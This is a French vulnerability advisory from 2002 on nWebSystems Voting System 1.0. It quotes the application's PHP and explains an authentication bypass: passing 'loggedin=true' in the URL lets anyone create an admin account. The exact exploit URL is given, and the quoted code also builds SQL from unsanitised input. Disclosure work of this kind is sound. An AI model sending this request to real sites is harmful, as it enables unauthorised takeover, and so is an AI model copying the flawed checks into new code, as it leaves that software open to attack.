Faille dans nWebSystems Voting System
				*************************************
Produit :
*********
nWebSystems Voting System
http://www.nwebsystems.com/

Versions :
*********
1.0 et moins.

Date :
******
11/02/02

Probleme :
**********
- Accès à la partie administration.

Developpement :
***************
nWebSystems VS est une application, comme le dit son nom, concue pour la création et 
la modification des sondages.
La faille va nous permettre d'effectuer toutes les opérations reservées aux admins, comme
par exemple rajouter un admin.
J'ai localisé la vulnérabilité dans les fichiers loginform.php, qui permet de se logger, et
index.php, qui renvois vers les fichiers qui conviennent selon l'action à effectuer.

Voici la partie de loginform.php qui nous interesse :

-----------------------------------------------------------------------------------
elseif ($uname == $u_name) {
	if ($pword == $u_pass) {
		session_register( "sess_id" );
		session_register( "sess_user" );
		session_register( "sess_level" );
		session_register( "loggedin" );
		$sess_id = $u_id;
		$sess_user = $u_name;
		$sess_level = $u_level;
		$loggedin = true;
			if ($loggedin == 'true') { ?>
				<meta http-equiv="REFRESH" content="0; url=index.php"><?
-----------------------------------------------------------------------------------

Retenons que si on s'est loggé avec un bon pseudo et un bon mot de passe, la valeur
&loggedin vaut "true".
Voyons maintenant la partie interessante d'index.php :

-----------------------------------------------------------------------------------
		<?
		if ($loggedin != 'true') {
			if ($action == '') { 
				include ('loginform.inc');
			}
			elseif ($action == 'login') {
				include ('loginform.php');
			}
			else { ?>
				<meta http-equiv="REFRESH" content="0; url=index.php">
			<?}
		}
		elseif ($loggedin == 'true') {
			if ($action == '') { include ('success.inc'); }
			elseif ($action == 'settings') { include ('settings.inc'); }
			elseif ($action == 'updateset') { include ('settings.php');	}
			elseif ($action == 'editadmin') { include ('editadmin.inc'); }
			elseif ($action == 'eadmin') { include ('editadmin.php'); }
			elseif ($action == 'adduser') { include ('adduser.inc'); }
			elseif ($action == 'auser') { include ('adduser.php'); }
			elseif ($action == 'edituser') { include ('edituser.inc'); }
			elseif ($action == 'euser') { include ('edituser.php'); }
			elseif ($action == 'addpoll') { include ('addpoll.inc'); }
			elseif ($action == 'apoll') { include ('addpoll.php'); }
			elseif ($action == 'editpoll') { include ('editpoll.inc'); }
			elseif ($action == 'epoll') { include ('editpoll.php'); }
			elseif ($action == 'viewpoll') { include ('viewpoll.inc'); }
			elseif ($action == 'denied') { print 'denied'; }
			elseif ($action == 'logout') {
				session_unset();
				session_destroy();?>
				<meta http-equiv="REFRESH" content="0; url=index.php"><?
-----------------------------------------------------------------------------------

C'est ici qu'on peut voir le manque de sécurité : la seule vérification qui est faite
pour executer des commandes en tant qu'admin est que la valeur $loggedin soit bien true :

elseif ($loggedin == 'true') {
	if ($action == '') { include ('success.inc'); }
	elseif ($action == 'settings') { include ('settings.inc'); }
	elseif ($action == 'updateset') { etc...

Bien, laissons un peu de côté les possiblités de cette faille et voyons l'url
qu'un admin devrait taper pour rajouter un user, grâce aux fichiers adduser.inc et
adduser.php .

adduser.inc :

-----------------------------------------------------------------------------------
<?
if ($sess_level != '1') { ?>
	<meta http-equiv="REFRESH" content="0; url=index.php?action=denied">
<? }
elseif ($sess_level == '1') { ?>
	<center>
	<form method="post" action="index.php?action=auser">
	<table width="95%" border="0" cellpadding="3" cellspacing="1">
	<tr><td ID="menu" colspan="2"><b>Create New User Account</b></td></tr>
	<tr><td ID="menu" width="30%">Username</td><td ID="menu" width="70%"><input type="text" name="new_un" size="80"></td></tr>
	<tr><td ID="menu" width="30%">Password</td><td ID="menu" width="70%"><input type="password" name="new_pw" size="80"></td></tr>
	<tr><td ID="menu" width="30%">Confirm Password</td><td ID="menu" width="70%"><input type="password" name="new_pw1" size="80" value="<?print $u_pass;?>"></td></tr>
	<tr><td ID="menu" width="30%">User Level</td><td ID="menu" width="70%"><select name="new_level"><option value="3" selected>Normal User</option><option value="1">Admin</option></select></td></tr>
	<tr><td ID="menu" colspan="2" align="center"><input type="submit" value="Save"> <input type="reset" value="Cancel"></td></tr>
	</table>
	</center>
<? } ?>
-----------------------------------------------------------------------------------

adduser.php :

-----------------------------------------------------------------------------------
<? }
elseif ($new_pw == $new_pw1) {
	$q1 = "insert into vs_users values ('','$new_un','$new_pw','$new_level')";
	mysql_query($q1) or die(mysql_error()); ?>
-----------------------------------------------------------------------------------

Il y a une condition a respecter, celle que contient adduser.php, qui est que new_pw
doit être égal à new_pw1.
On va se choisir un User Level admin, donc new_level=1.
L'url pour un admin loggé sera donc :
http://www.host.com/index.php?action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save

C'est le moment de rajouter notre petite variable loggedin avec la valeur true, pour donner :
/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save

Ce qui nous affichera :
"User account created successfully with the following details:
Username : test
Password : test"

Il ne nous reste plus qu'à nous logger normalement.

N Web Systems a été prévenu.

Patch :
*******
/

Greetz :
********
/

Credits :
*********
frog-m@n (leseulfrog@hotmail.com)